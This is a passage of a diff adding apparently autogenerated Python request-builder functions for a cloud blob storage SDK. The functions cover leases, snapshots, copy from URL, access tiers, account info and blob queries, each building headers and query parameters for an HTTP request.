action = kwargs.pop('action', "renew") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_change_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "change") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + lease_id = kwargs.pop('lease_id') # type: str + proposed_lease_id = kwargs.pop('proposed_lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-proposed-lease-id'] = _SERIALIZER.header("proposed_lease_id", proposed_lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_break_lease_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "lease") # type: str + action = kwargs.pop('action', "break") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + break_period = kwargs.pop('break_period', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + if break_period is not None: + _header_parameters['x-ms-lease-break-period'] = _SERIALIZER.header("break_period", break_period, 'int') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_create_snapshot_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "snapshot") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_start_copy_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + version = kwargs.pop('version', "2021-04-10") # type: str + copy_source = kwargs.pop('copy_source') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + rehydrate_priority = kwargs.pop('rehydrate_priority', None) # type: Optional[Union[str, "_models.RehydratePriority"]] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + source_if_tags = kwargs.pop('source_if_tags', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + seal_blob = kwargs.pop('seal_blob', None) # type: Optional[bool] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if rehydrate_priority is not None: + _header_parameters['x-ms-rehydrate-priority'] = _SERIALIZER.header("rehydrate_priority", rehydrate_priority, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + if source_if_tags is not None: + _header_parameters['x-ms-source-if-tags'] = _SERIALIZER.header("source_if_tags", source_if_tags, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("copy_source", copy_source, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if seal_blob is not None: + _header_parameters['x-ms-seal-blob'] = _SERIALIZER.header("seal_blob", seal_blob, 'bool') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_copy_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + x_ms_requires_sync = kwargs.pop('x_ms_requires_sync', "true") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + copy_source = kwargs.pop('copy_source') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + copy_source_tags = kwargs.pop('copy_source_tags', None) # type: Optional[Union[str, "_models.BlobCopySourceTags"]] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-requires-sync'] = _SERIALIZER.header("x_ms_requires_sync", x_ms_requires_sync, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("copy_source", copy_source, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if copy_source_tags is not None: + _header_parameters['x-ms-copy-source-tag-option'] = _SERIALIZER.header("copy_source_tags", copy_source_tags, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_abort_copy_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "copy") # type: str + copy_action_abort_constant = kwargs.pop('copy_action_abort_constant', "abort") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + copy_id = kwargs.pop('copy_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['copyid'] = _SERIALIZER.query("copy_id", copy_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-copy-action'] = _SERIALIZER.header("copy_action_abort_constant", copy_action_abort_constant, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_set_tier_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "tier") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + tier = kwargs.pop('tier') # type: Union[str, "_models.AccessTierRequired"] + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + version_id = kwargs.pop('version_id', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + rehydrate_priority = kwargs.pop('rehydrate_priority', None) # type: Optional[Union[str, "_models.RehydratePriority"]] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if version_id is not None: + _query_parameters['versionid'] = _SERIALIZER.query("version_id", version_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if rehydrate_priority is not None: + _header_parameters['x-ms-rehydrate-priority'] = _SERIALIZER.header("rehydrate_priority", rehydrate_priority, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_account_info_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_query_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "query") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + 